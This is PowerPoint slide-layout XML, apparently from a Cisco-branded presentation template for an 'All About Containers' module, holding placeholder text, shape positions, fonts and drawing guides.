                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2DDF9A5-625B-8E46-9E72-83F2F21E8AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04592BED-B631-074E-AA32-97F32633717E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3762994" y="2129076"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10972781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torytelling">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463763" y="1439060"/>
            <a:ext cx="3820348" cy="2265389"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="61715" tIns="34288" rIns="61715" bIns="34288" rtlCol="0">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4500" b="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922520" y="654518"/>
            <a:ext cx="3865880" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1500"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1500"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1500"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1500"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4284865842"/>
      </p:ext>
    </p:extLst>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Half_Page_Blue_Blank">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GB" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477678" y="4741653"/>
            <a:ext cx="2946839"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kern="1200" spc="20" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:alpha val="60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5545126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044">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="2193">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="2675">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="320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437766" y="1349354"/>
            <a:ext cx="4003995" cy="3040875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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11" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4708110" y="1349375"/>
            <a:ext cx="4075144" cy="3041208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="CiscoSans ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>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36480252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Segue_White">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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EFC08FC-0DC3-554A-9D27-FDBE6720D32A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22964409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9915" y="3209550"/>
            <a:ext cx="4684867" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="68574" tIns="34288" rIns="68574" bIns="34288" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="685748" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1080"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="92D050"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1800" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342871" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685748" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1028622" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371498" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1714369" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2057246" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2400120" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2742996" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459525" y="2462027"/>
            <a:ext cx="4712557" cy="766763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="61715" tIns="34288" rIns="61715" bIns="34288" rtlCol="0" anchor="b">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5200" b="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Picture Placeholder 30"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540381" y="1438276"/>
            <a:ext cx="2676525" cy="2166938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-l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0525976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916830"/>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_Photo_4_gri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20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415925" y="819151"/>
            <a:ext cx="3698875" cy="1095374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="0"/>
            <a:ext cx="4572000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415925" y="2343150"/>
            <a:ext cx="3698875" cy="2076450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323711876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pos="2592">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="324">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="1068">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="2916">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="1632">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="936">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="262">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="2880">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="3604">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="4041">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" pos="5376">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" orient="horz" pos="1212">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" orient="horz" pos="516">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" orient="horz" pos="716">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="15" orient="horz" pos="147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2_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg2"/>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69497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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7" y="4072670"/>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7" y="4348763"/>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3" y="3043654"/>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1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FEF53B4-FCFE-924B-AA4A-AB56BBF1AAA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="425765" y="52809"/>
            <a:ext cx="2540384" cy="1838808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{254DBBAF-BF48-0C4E-9336-2D3C70D1F53E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48881DA9-736F-3D4A-B962-E7BD6AF257EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="1823225"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3990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DCI Title">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432958-3DAC-1540-8377-CD6910C8AD8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224"/>
            <a:ext cx="9144000" cy="5163057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4072670"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4348763"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3" y="3043654"/>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2"/>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BF87238-9584-4547-92FF-1D7CD0E8CD8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69496" y="237203"/>
            <a:ext cx="2209800" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13201F20-7B4F-7E40-B929-A1315CB892A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D7A8714-83C0-0F49-8386-11EE793A7854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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3504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DNA Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg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739AC88-612D-1948-AA17-2DAEC68C8E1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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4072670"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4348763"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
